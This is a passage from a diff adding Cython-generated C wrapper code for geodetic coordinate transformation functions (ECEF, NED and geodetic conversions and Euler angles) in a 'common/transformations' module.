{&__pyx_n_s_ecef_init,&__pyx_n_s_ned_pose,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ecef_init)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 90, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ned_pose)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 90, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("ecef_euler_from_ned_single", 1, 2, 2, 1); __PYX_ERR(0, 90, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "ecef_euler_from_ned_single") < 0)) __PYX_ERR(0, 90, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_ecef_init = values[0]; + __pyx_v_ned_pose = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("ecef_euler_from_ned_single", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 90, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.ecef_euler_from_ned_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_14ecef_euler_from_ned_single(__pyx_self, __pyx_v_ecef_init, __pyx_v_ned_pose); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_14ecef_euler_from_ned_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_ecef_init, PyObject *__pyx_v_ned_pose) { + struct ECEF __pyx_v_init; + Eigen::Vector3d __pyx_v_pose; + Eigen::Vector3d __pyx_v_e; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + struct ECEF __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + double __pyx_t_3; + double __pyx_t_4; + double __pyx_t_5; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("ecef_euler_from_ned_single", 0); + + /* "common/transformations/transformations.pyx":91 + * + * def ecef_euler_from_ned_single(ecef_init, ned_pose): + * cdef ECEF init = list2ecef(ecef_init) # <<<<<<<<<<<<<< + * cdef Vector3 pose = Vector3(ned_pose[0], ned_pose[1], ned_pose[2]) + * + */ + __pyx_t_1 = __pyx_f_6common_15transformations_15transformations_list2ecef(__pyx_v_ecef_init); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 91, __pyx_L1_error) + __pyx_v_init = __pyx_t_1; + + /* "common/transformations/transformations.pyx":92 + * def ecef_euler_from_ned_single(ecef_init, ned_pose): + * cdef ECEF init = list2ecef(ecef_init) + * cdef Vector3 pose = Vector3(ned_pose[0], ned_pose[1], ned_pose[2]) # <<<<<<<<<<<<<< + * + * cdef Vector3 e = ecef_euler_from_ned_c(init, pose) + */ + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_ned_pose, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 92, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_ned_pose, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 92, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_4 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_ned_pose, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 92, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_5 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_5 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_pose = Eigen::Vector3d(__pyx_t_3, __pyx_t_4, __pyx_t_5); + + /* "common/transformations/transformations.pyx":94 + * cdef Vector3 pose = Vector3(ned_pose[0], ned_pose[1], ned_pose[2]) + * + * cdef Vector3 e = ecef_euler_from_ned_c(init, pose) # <<<<<<<<<<<<<< + * return [e(0), e(1), e(2)] + * + */ + __pyx_v_e = ecef_euler_from_ned(__pyx_v_init, __pyx_v_pose); + + /* "common/transformations/transformations.pyx":95 + * + * cdef Vector3 e = ecef_euler_from_ned_c(init, pose) + * return [e(0), e(1), e(2)] # <<<<<<<<<<<<<< + * + * def ned_euler_from_ecef_single(ecef_init, ecef_pose): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = PyFloat_FromDouble(__pyx_v_e(0)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 95, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_6 = PyFloat_FromDouble(__pyx_v_e(1)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 95, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = PyFloat_FromDouble(__pyx_v_e(2)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 95, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = PyList_New(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 95, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_GIVEREF(__pyx_t_2); + PyList_SET_ITEM(__pyx_t_8, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_6); + PyList_SET_ITEM(__pyx_t_8, 1, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_7); + PyList_SET_ITEM(__pyx_t_8, 2, __pyx_t_7); + __pyx_t_2 = 0; + __pyx_t_6 = 0; + __pyx_t_7 = 0; + __pyx_r = __pyx_t_8; + __pyx_t_8 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":90 + * return matrix2numpy(rot_matrix_c(roll, pitch, yaw)) + * + * def ecef_euler_from_ned_single(ecef_init, ned_pose): # <<<<<<<<<<<<<< + * cdef ECEF init = list2ecef(ecef_init) + * cdef Vector3 pose = Vector3(ned_pose[0], ned_pose[1], ned_pose[2]) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("common.transformations.transformations.ecef_euler_from_ned_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":97 + * return [e(0), e(1), e(2)] + * + * def ned_euler_from_ecef_single(ecef_init, ecef_pose): # <<<<<<<<<<<<<< + * cdef ECEF init = list2ecef(ecef_init) + * cdef Vector3 pose = Vector3(ecef_pose[0], ecef_pose[1], ecef_pose[2]) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_17ned_euler_from_ecef_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_17ned_euler_from_ecef_single = {"ned_euler_from_ecef_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_17ned_euler_from_ecef_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_17ned_euler_from_ecef_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_ecef_init = 0; + PyObject *__pyx_v_ecef_pose = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("ned_euler_from_ecef_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_ecef_init,&__pyx_n_s_ecef_pose,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ecef_init)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 97, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ecef_pose)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 97, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("ned_euler_from_ecef_single", 1, 2, 2, 1); __PYX_ERR(0, 97, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "ned_euler_from_ecef_single") < 0)) __PYX_ERR(0, 97, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_ecef_init = values[0]; + __pyx_v_ecef_pose = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("ned_euler_from_ecef_single", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 97, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.ned_euler_from_ecef_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_16ned_euler_from_ecef_single(__pyx_self, __pyx_v_ecef_init, __pyx_v_ecef_pose); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_16ned_euler_from_ecef_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_ecef_init, PyObject *__pyx_v_ecef_pose) { + struct ECEF __pyx_v_init; + Eigen::Vector3d __pyx_v_pose; + Eigen::Vector3d __pyx_v_e; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + struct ECEF __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + double __pyx_t_3; + double __pyx_t_4; + double __pyx_t_5; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("ned_euler_from_ecef_single", 0); + + /* "common/transformations/transformations.pyx":98 + * + * def ned_euler_from_ecef_single(ecef_init, ecef_pose): + * cdef ECEF init = list2ecef(ecef_init) # <<<<<<<<<<<<<< + * cdef Vector3 pose = Vector3(ecef_pose[0], ecef_pose[1], ecef_pose[2]) + * + */ + __pyx_t_1 = __pyx_f_6common_15transformations_15transformations_list2ecef(__pyx_v_ecef_init); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 98, __pyx_L1_error) + __pyx_v_init = __pyx_t_1; + + /* "common/transformations/transformations.pyx":99 + * def ned_euler_from_ecef_single(ecef_init, ecef_pose): + * cdef ECEF init = list2ecef(ecef_init) + * cdef Vector3 pose = Vector3(ecef_pose[0], ecef_pose[1], ecef_pose[2]) # <<<<<<<<<<<<<< + * + * cdef Vector3 e = ned_euler_from_ecef_c(init, pose) + */ + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_ecef_pose, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 99, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_ecef_pose, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_4 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 99, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_ecef_pose, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_5 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_5 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 99, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_pose = Eigen::Vector3d(__pyx_t_3, __pyx_t_4, __pyx_t_5); + + /* "common/transformations/transformations.pyx":101 + * cdef Vector3 pose = Vector3(ecef_pose[0], ecef_pose[1], ecef_pose[2]) + * + * cdef Vector3 e = ned_euler_from_ecef_c(init, pose) # <<<<<<<<<<<<<< + * return [e(0), e(1), e(2)] + * + */ + __pyx_v_e = ned_euler_from_ecef(__pyx_v_init, __pyx_v_pose); + + /* "common/transformations/transformations.pyx":102 + * + * cdef Vector3 e = ned_euler_from_ecef_c(init, pose) + * return [e(0), e(1), e(2)] # <<<<<<<<<<<<<< + * + * def geodetic2ecef_single(geodetic): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = PyFloat_FromDouble(__pyx_v_e(0)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_6 = PyFloat_FromDouble(__pyx_v_e(1)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = PyFloat_FromDouble(__pyx_v_e(2)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = PyList_New(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 102, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_GIVEREF(__pyx_t_2); + PyList_SET_ITEM(__pyx_t_8, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_6); + PyList_SET_ITEM(__pyx_t_8, 1, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_7); + PyList_SET_ITEM(__pyx_t_8, 2, __pyx_t_7); + __pyx_t_2 = 0; + __pyx_t_6 = 0; + __pyx_t_7 = 0; + __pyx_r = __pyx_t_8; + __pyx_t_8 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":97 + * return [e(0), e(1), e(2)] + * + * def ned_euler_from_ecef_single(ecef_init, ecef_pose): # <<<<<<<<<<<<<< + * cdef ECEF init = list2ecef(ecef_init) + * cdef Vector3 pose = Vector3(ecef_pose[0], ecef_pose[1], ecef_pose[2]) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("common.transformations.transformations.ned_euler_from_ecef_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":104 + * return [e(0), e(1), e(2)] + * + * def geodetic2ecef_single(geodetic): # <<<<<<<<<<<<<< + * cdef Geodetic g = list2geodetic(geodetic) + * cdef ECEF e = geodetic2ecef_c(g) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_19geodetic2ecef_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_19geodetic2ecef_single = {"geodetic2ecef_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_19geodetic2ecef_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_19geodetic2ecef_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_geodetic = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("geodetic2ecef_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_geodetic,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_geodetic)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "geodetic2ecef_single") < 0)) __PYX_ERR(0, 104, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_geodetic = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("geodetic2ecef_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 104, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.geodetic2ecef_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_18geodetic2ecef_single(__pyx_self, __pyx_v_geodetic); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_18geodetic2ecef_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_geodetic) { + struct Geodetic __pyx_v_g; + struct ECEF __pyx_v_e; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + struct Geodetic __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("geodetic2ecef_single", 0); + + /* "common/transformations/transformations.pyx":105 + * + * def geodetic2ecef_single(geodetic): + * cdef Geodetic g = list2geodetic(geodetic) # <<<<<<<<<<<<<< + * cdef ECEF e = geodetic2ecef_c(g) + * return [e.x, e.y, e.z] + */ + __pyx_t_1 = __pyx_f_6common_15transformations_15transformations_list2geodetic(__pyx_v_geodetic); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 105, __pyx_L1_error) + __pyx_v_g = __pyx_t_1; + + /* "common/transformations/transformations.pyx":106 + * def geodetic2ecef_single(geodetic): + * cdef Geodetic g = list2geodetic(geodetic) + * cdef ECEF e = geodetic2ecef_c(g) # <<<<<<<<<<<<<< + * return [e.x, e.y, e.z] + * + */ + __pyx_v_e = geodetic2ecef(__pyx_v_g); + + /* "common/transformations/transformations.pyx":107 + * cdef Geodetic g = list2geodetic(geodetic) + * cdef ECEF e = geodetic2ecef_c(g) + * return [e.x, e.y, e.z] # <<<<<<<<<<<<<< + * + * def ecef2geodetic_single(ecef): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = PyFloat_FromDouble(__pyx_v_e.x); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_e.y); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyFloat_FromDouble(__pyx_v_e.z); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyList_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 107, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_2); + PyList_SET_ITEM(__pyx_t_5, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_5, 1, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_5, 2, __pyx_t_4); + __pyx_t_2 = 0; + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_r = __pyx_t_5; + __pyx_t_5 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":104 + * return [e(0), e(1), e(2)] + * + * def geodetic2ecef_single(geodetic): # <<<<<<<<<<<<<< + * cdef Geodetic g = list2geodetic(geodetic) + * cdef ECEF e = geodetic2ecef_c(g) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("common.transformations.transformations.geodetic2ecef_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":109 + * return [e.x, e.y, e.z] + * + * def ecef2geodetic_single(ecef): # <<<<<<<<<<<<<< + * cdef ECEF e = list2ecef(ecef) + * cdef Geodetic g = ecef2geodetic_c(e) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_21ecef2geodetic_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_21ecef2geodetic_single = {"ecef2geodetic_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_21ecef2geodetic_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_21ecef2geodetic_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_ecef = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("ecef2geodetic_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_ecef,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ecef)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 109, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "ecef2geodetic_single") < 0)) __PYX_ERR(0, 109, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_ecef = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("ecef2geodetic_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 109, __pyx_L3_error) + __pyx_L3_error:; + 